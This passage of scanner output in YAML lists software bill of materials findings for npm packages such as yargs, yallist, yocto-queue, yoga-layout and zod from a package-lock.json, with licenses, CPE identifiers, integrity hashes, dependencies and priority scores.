metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz
|
|
integrity: sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 20985a40c61069a1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: yallist 4.0.0'
|
|
title: yallist 4.0.0
|
|
description: 'Package discovered: yallist 4.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c85ae4ebdc6284ae
|
|
name: yallist
|
|
version: 4.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:yallist:yallist:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/yallist@4.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz
|
|
integrity: sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 71c51c3c7b12c140
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: yargs 15.4.1'
|
|
title: yargs 15.4.1
|
|
description: 'Package discovered: yargs 15.4.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bbb181fdab2eb6da
|
|
name: yargs
|
|
version: 15.4.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:yargs:yargs:15.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/yargs@15.4.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz
|
|
integrity: sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A==
|
|
dependencies:
|
|
cliui: ^6.0.0
|
|
decamelize: ^1.2.0
|
|
find-up: ^4.1.0
|
|
get-caller-file: ^2.0.1
|
|
require-directory: ^2.1.1
|
|
require-main-filename: ^2.0.0
|
|
set-blocking: ^2.0.0
|
|
string-width: ^4.2.0
|
|
which-module: ^2.0.0
|
|
y18n: ^4.0.0
|
|
yargs-parser: ^18.1.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 96fe97c2b6d8795a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: yargs 17.7.2'
|
|
title: yargs 17.7.2
|
|
description: 'Package discovered: yargs 17.7.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c2726c8cb18290f2
|
|
name: yargs
|
|
version: 17.7.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:yargs:yargs:17.7.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/yargs@17.7.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz
|
|
integrity: sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==
|
|
dependencies:
|
|
cliui: ^8.0.1
|
|
escalade: ^3.1.1
|
|
get-caller-file: ^2.0.5
|
|
require-directory: ^2.1.1
|
|
string-width: ^4.2.3
|
|
y18n: ^5.0.5
|
|
yargs-parser: ^21.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ee09b685d8bedc8a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: yargs-parser 18.1.3'
|
|
title: yargs-parser 18.1.3
|
|
description: 'Package discovered: yargs-parser 18.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 385fd2e9c795bcc7
|
|
name: yargs-parser
|
|
version: 18.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:yargs:yargs-parser:18.1.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/yargs-parser@18.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz
|
|
integrity: sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ==
|
|
dependencies:
|
|
camelcase: ^5.0.0
|
|
decamelize: ^1.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a4ff6cebec5b0be4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: yargs-parser 21.1.1'
|
|
title: yargs-parser 21.1.1
|
|
description: 'Package discovered: yargs-parser 21.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 95c25d265eed6eaf
|
|
name: yargs-parser
|
|
version: 21.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:yargs:yargs-parser:21.1.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/yargs-parser@21.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz
|
|
integrity: sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 14bd34194369a5c5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: yocto-queue 0.1.0'
|
|
title: yocto-queue 0.1.0
|
|
description: 'Package discovered: yocto-queue 0.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 813268dedfe3539f
|
|
name: yocto-queue
|
|
version: 0.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:yocto-queue:yocto-queue:0.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yocto-queue:yocto_queue:0.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yocto_queue:yocto-queue:0.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yocto_queue:yocto_queue:0.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yocto:yocto-queue:0.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yocto:yocto_queue:0.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/yocto-queue@0.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz
|
|
integrity: sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 16bb4d5a9e7dc8d3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: yoga-layout 2.0.1'
|
|
title: yoga-layout 2.0.1
|
|
description: 'Package discovered: yoga-layout 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 579e04e050802ec1
|
|
name: yoga-layout
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:yoga-layout:yoga-layout:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yoga-layout:yoga_layout:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yoga_layout:yoga-layout:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yoga_layout:yoga_layout:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yoga:yoga-layout:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:yoga:yoga_layout:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/yoga-layout@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/yoga-layout/-/yoga-layout-2.0.1.tgz
|
|
integrity: sha512-tT/oChyDXelLo2A+UVnlW9GU7CsvFMaEnd9kVFsaiCQonFAXd3xrHhkLYu+suwwosrAEQ746xBU+HvYtm1Zs2Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6ac3ad6fac7a8b51
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: zod 3.25.76'
|
|
title: zod 3.25.76
|
|
description: 'Package discovered: zod 3.25.76'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c30d59c73bdda635
|
|
name: zod
|
|
version: 3.25.76
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:zod:zod:3.25.76:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/zod@3.25.76
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/zod/-/zod-3.25.76.tgz
|
|
integrity: sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|